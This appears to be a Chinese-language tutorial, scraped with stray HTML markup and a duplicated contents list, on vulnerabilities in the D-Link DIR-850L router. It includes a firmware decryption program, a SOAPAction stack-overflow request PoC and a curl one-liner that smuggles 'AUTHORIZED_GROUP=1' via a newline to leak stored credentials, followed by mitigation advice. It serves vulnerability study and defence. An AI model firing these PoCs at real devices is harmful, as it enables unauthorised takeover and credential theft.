D-Link DIR-850L 路由器漏洞分析与利用教学文档<\/h1>

一、前期准备<\/h2>

1.1 固件获取<\/h3>
DIR-850L 路由器有两个版本的固件可供分析：<\/p>
REVA 版本固件：<\/p>
ftp:\/\/ftp2.dlink.com\/PRODUCTS\/DIR-850L\/REVA\/DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP
<\/code><\/pre>
<\/li>

REVB 版本固件：<\/p>
ftp:\/\/ftp2.dlink.com\/PRODUCTS\/DIR-850L\/REVB\/DIR-850L_REVB_FIRMWARE_2.07.B05_WW.ZIP
<\/code><\/pre>
<\/li>
<\/ul>
1.2 固件分析<\/h3>
使用 binwalk<\/code> 分析 REVA 版本固件：<\/p>
binwalk DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP
<\/span><\/span><\/code><\/pre>输出显示包含 PDF 文件和未加密的固件。<\/p>
REVB 版本固件被加密，需要使用解密工具：<\/p>
\/* 
<\/span><\/span><\/span> * D-LINK DIR-850L REVB 固件解密程序
<\/span><\/span><\/span> * 编译: gcc -o revbdec revbdec.c
<\/span><\/span><\/span> * 使用: .\/revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > decrypted.bin
<\/span><\/span><\/span> *\/<\/span>
<\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/stat.h><\/span>
<\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>#define USAGE "Usage: decimg <filename> <key>\n"
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) {
<\/span><\/span>    int<\/span> i, fi;
<\/span><\/span>    int<\/span> fo =<\/span> STDOUT_FILENO, fe =<\/span> STDERR_FILENO;
<\/span><\/span>    
<\/span><\/span>    if<\/span> (argc !=<\/span> 3<\/span>) {
<\/span><\/span>        write(fe, USAGE, strlen(USAGE));
<\/span><\/span>        return<\/span> (EXIT_FAILURE);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    if<\/span> ((fi =<\/span> open(argv[1<\/span>], O_RDONLY)) ==<\/span> -<\/span>1<\/span>) {
<\/span><\/span>        perror("open"<\/span>);
<\/span><\/span>        write(fe, USAGE, strlen(USAGE));
<\/span><\/span>        return<\/span> (EXIT_FAILURE);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    const<\/span> char<\/span> *<\/span>key =<\/span> argv[2<\/span>];
<\/span><\/span>    int<\/span> kl =<\/span> strlen(key);
<\/span><\/span>    i =<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    while<\/span> (1<\/span>) {
<\/span><\/span>        char<\/span> buffer[4096<\/span>];
<\/span><\/span>        int<\/span> j, len;
<\/span><\/span>        len =<\/span> read(fi, buffer, 4096<\/span>);
<\/span><\/span>        if<\/span> (len <=<\/span> 0<\/span>) break<\/span>;
<\/span><\/span>        
<\/span><\/span>        for<\/span> (j =<\/span> 0<\/span>; j <<\/span> len; j++<\/span>) {
<\/span><\/span>            buffer[j] ^=<\/span> (i +<\/span> j) %<\/span> 0xFB<\/span> +<\/span> 1<\/span>;
<\/span><\/span>            buffer[j] ^=<\/span> key[(i +<\/span> j) %<\/span> kl];
<\/span><\/span>        }
<\/span><\/span>        write(fo, buffer, len);
<\/span><\/span>        i +=<\/span> len;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> (EXIT_SUCCESS);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解密后使用 binwalk<\/code> 分析：<\/p>
binwalk DIR850LB1_FW207WWb05.decrypted
<\/span><\/span><\/code><\/pre>输出显示包含 Squashfs 文件系统。<\/p>
1.3 固件解压<\/h3>
使用 binwalk -Me<\/code> 解压固件：<\/p>
binwalk -Me DIR850LB1_FW207WWb05.decrypted
<\/span><\/span><\/code><\/pre>二、漏洞分析<\/h2>
2.1 栈溢出漏洞<\/h3>
漏洞文件<\/strong>: squashfs-root\/htdocs\/cgibin<\/code><\/p>
保护机制检查<\/strong>:<\/p>
[*] '\/squashfs-root\/htdocs\/cgibin'
    Arch:     mips-32-big
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
<\/code><\/pre>
漏洞成因<\/strong>:<\/p>

在处理 HTTP_SOAPACTION<\/code> 内容时，使用 getenv<\/code> 获取环境变量值<\/li>
使用 strcat()<\/code> 函数拼接 HNAP_AUTH<\/code> 和 HTTP_SOAPACTION<\/code> 时没有长度限制<\/li>
当输入超过 547 字节时，将覆盖 PC 指针，控制程序执行流<\/li>
<\/ul>
关键汇编代码<\/strong>:<\/p>
0<\/span>x00414130<\/span> 8<\/span>f998410<\/span> lw<\/span> t9<\/span>, -0x7bf0<\/span>(gp<\/span>) ; [0x43ad50:4]=0x4251e0 sym.imp.getenv
<\/span><\/span><\/span><\/span>0x00414134<\/span> 0320<\/span>f809<\/span> jalr<\/span> t9<\/span>
<\/span><\/span>0<\/span>x00414138<\/span> 24847<\/span>dac<\/span> addiu<\/span> a0<\/span>, a0<\/span>, 0x7dac<\/span> ; HTTP_SOAPACTION
<\/span><\/span><\/span><\/span>0x0041413c<\/span> 3<\/span>c040042<\/span> lui<\/span> a0<\/span>, 0x42<\/span>
<\/span><\/span>0<\/span>x00414140<\/span> 8<\/span>fbc0020<\/span> lw<\/span> gp<\/span>, 0x20<\/span>(sp<\/span>)
<\/span><\/span>0<\/span>x00414144<\/span> 2484615<\/span>c<\/span> addiu<\/span> a0<\/span>, a0<\/span>, 0x615c<\/span>
<\/span><\/span>0<\/span>x00414148<\/span> 8<\/span>f998410<\/span> lw<\/span> t9<\/span>, -0x7bf0<\/span>(gp<\/span>) ; [0x43ad50:4]=0x4251e0 sym.imp.getenv
<\/span><\/span><\/span><\/span>0x0041414c<\/span> 0320<\/span>f809<\/span> jalr<\/span> t9<\/span>
<\/span><\/span>0<\/span>x00414150<\/span> 00408821<\/span> move<\/span> s1<\/span>, v0<\/span> ; HTTP_SOAPACTION saved to s1.
<\/span><\/span><\/span><\/span>0x00414a14<\/span> 02402021<\/span> move<\/span> a0<\/span>, s2<\/span> ; arg1 (dest)
<\/span><\/span><\/span><\/span>0x00414a18<\/span> 8<\/span>fbc0020<\/span> lw<\/span> gp<\/span>, 0x20<\/span>(sp<\/span>)
<\/span><\/span>0<\/span>x00414a1c<\/span> 8<\/span>f9982b0<\/span> lw<\/span> t9<\/span>, -0x7d50<\/span>(gp<\/span>) ; [0x43abf0:4]=0x4253e0 sym.imp.strcat
<\/span><\/span><\/span><\/span>0x00414a20<\/span> 0320<\/span>f809<\/span> jalr<\/span> t9<\/span> ; Call to strcat
<\/span><\/span><\/span><\/span>0x00414a24<\/span> 02202821<\/span> move<\/span> a1<\/span>, s1<\/span> ; arg2 (src)
<\/span><\/span><\/span><\/code><\/pre>POC<\/strong>:<\/p>
POST<\/span> \/HNAP1\/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.0.1<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (X11; Fedora; Linux x86_64; rv:49.0) Gecko\/20100101 Firefox\/49.0<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en-US,en;q=0.5<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Content-Type:<\/span> text\/xml; charset=utf-8<\/span>
<\/span><\/span>SOAPAction:<\/span> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAA<\/span>
<\/span><\/span>HNAP_AUTH:<\/span> BBD0605AF8690024AF8568BE88DD7B8E 1482588069<\/span>
<\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/192.168.0.1\/info\/Login.html<\/span>
<\/span><\/span>Content-Length:<\/span> 306<\/span>
<\/span><\/span>Cookie:<\/span> uid=OLnLaWBI8S<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span><\/code><\/pre>2.2 文件读取漏洞<\/h3>
漏洞文件<\/strong>: \/htdocs\/web\/getcfg.php<\/code><\/p>
漏洞成因<\/strong>:<\/p>

GETCFG_SVC<\/code> 参数可控，通过 dophp<\/code> 函数进行文件读取<\/li>
需要 is_power_user<\/code> 函数返回值为1<\/li>
AUTHORIZED_GROUP<\/code> 全局变量由 cgibin<\/code> 传入，可通过构造请求绕过验证<\/li>
<\/ul>
利用方法<\/strong>:<\/p>

分析 cgibin<\/code> 文件处理 POST 请求的部分<\/li>
发现 cgibin_parse_request<\/code> 函数处理 HTTP 请求时，经过 sess_validate<\/code> 验证的数据会赋值给 AUTHORIZED_GROUP<\/code><\/li>
sobj_add_char<\/code> 函数使用 0xA<\/code> ('\n') 分隔参数<\/li>
<\/ol>
POC<\/strong>:<\/p>
curl -d "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1"<\/span> "http:\/\/[IP]\/getcfg.php"<\/span>
<\/span><\/span><\/code><\/pre>参数说明<\/strong>:<\/p>

SERVICES=DEVICE.ACCOUNT<\/code>: 构造 DEVICE.ACCOUNT.xml.php 配置文件<\/li>
%0a<\/code>: URL 编码的换行符<\/li>
成功利用后会泄露账户密码（未设置密码时显示为空）<\/li>
<\/ul>
三、漏洞利用步骤<\/h2>
3.1 栈溢出漏洞利用<\/h3>

构造超长 SOAPAction<\/code> 头部<\/li>
精确控制溢出长度（547字节以上）<\/li>
覆盖 PC 指针控制程序流<\/li>
构造 ROP 链或 shellcode 实现任意代码执行<\/li>
<\/ol>
3.2 文件读取漏洞利用<\/h3>

发送 POST 请求到 \/getcfg.php<\/code><\/li>
构造包含换行符的参数<\/li>
通过 AUTHORIZED_GROUP=1<\/code> 绕过权限检查<\/li>
读取敏感配置文件获取凭证<\/li>
<\/ol>
四、防护建议<\/h2>

对 strcat<\/code> 等危险函数替换为安全版本（如 strncat<\/code>）<\/li>
对用户输入进行严格长度检查<\/li>
启用栈保护机制（Canary, NX, ASLR）<\/li>
对权限验证逻辑进行加固，防止绕过<\/li>
及时更新固件到最新版本<\/li>
<\/ol>
五、参考资源<\/h2>

NCC Group 技术报告: D-Link DIR-850L Web Admin Interface Vulnerable to Stack-Based Buffer Overflow<\/a><\/li>
先知社区原文链接<\/li>
<\/ul>
D-Link DIR-850L 路由器漏洞分析与利用教学文档<\/h1>

一、前期准备<\/h2>

二、漏洞分析<\/h2>

三、漏洞利用步骤<\/h2>

五、参考资源<\/h2> NCC Group 技术报告: D-Link DIR-850L Web Admin Interface Vulnerable to Stack-Based Buffer Overflow<\/a><\/li> 先知社区原文链接<\/li> <\/ul>

五、参考资源<\/h2>

NCC Group 技术报告: D-Link DIR-850L Web Admin Interface Vulnerable to Stack-Based Buffer Overflow<\/a><\/li>
先知社区原文链接<\/li> <\/ul>
